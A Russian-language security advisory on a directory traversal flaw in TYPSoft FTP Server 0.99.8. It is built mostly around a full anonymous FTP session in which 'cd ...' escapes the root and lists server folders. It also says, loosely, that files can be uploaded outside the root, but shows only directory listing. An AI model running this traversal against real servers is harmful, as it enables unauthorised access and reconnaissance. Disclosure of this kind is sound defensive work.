Marc Bergeron TYPSoft – FTP сервер для Windows систем, поддерживающий стандартные FTP команды, виртуальную архитектуру файловой системы, ограничение по IP адресам и
т.п. вещи. Уязвимость в программе позволяет удаленным нападающим загружать файлы на сервере вне корневого каталога.
Уязвимость связанна с недостаточной фильтрацией последовательности "." в URL запросах. Любой удаленный пользователь с законным или анонимным доступом к уязвимому TYPSoft FTP серверу может эксплуатировать уязвимость и свободно просмотреть структуру каталогов на уязвимой системе. Такая информация может оказаться полезной в последующих нападениях.
Пример:
C:\>ftp 10.20.30.40
Connected to 10.20.30.40.
220 TYPSoft FTP Server 0.99.8 ready...
User (10.20.30.40:(none)): anonymous
331 Password required for anonymous.
Password:
230 User anonymous logged in.
ftp> ls
200 Port command successful.
150 Opening data connection for directory list.
.
226 Transfer complete.
ftp: 7 bytes received in 0.00Seconds 7000.00Kbytes/sec.
ftp> cd /
250 CWD command successful. "/C:/Inetpub/ftproot/" is current directory.
ftp> ls
200 Port command successful.
150 Opening data connection for directory list.
.
226 Transfer complete.
ftp: 7 bytes received in 0.00Seconds 7000.00Kbytes/sec.
ftp> cd ..
550 'C:\Inetpub\ftproot\Inetpub\': no such file or directory.
ftp> ls
200 Port command successful.
150 Opening data connection for directory list.
.
226 Transfer complete.
ftp: 7 bytes received in 0.00Seconds 7000.00Kbytes/sec.
ftp> cd ...
250 CWD command successful. "/C:/Inetpub/ftproot/.../" is current directory.
ftp> ls
200 Port command successful.
150 Opening data connection for directory list.
.
AdminScripts
ftproot
iissamples
mailroot
Scripts
webpub
wwwroot
226 Transfer complete.
ftp: 78 bytes received in 0.01Seconds 7.80Kbytes/sec.
ftp> bye
221 Goodbye!
Уязвимость обнаружена в TYPSoft FTP Server version 0.99.8.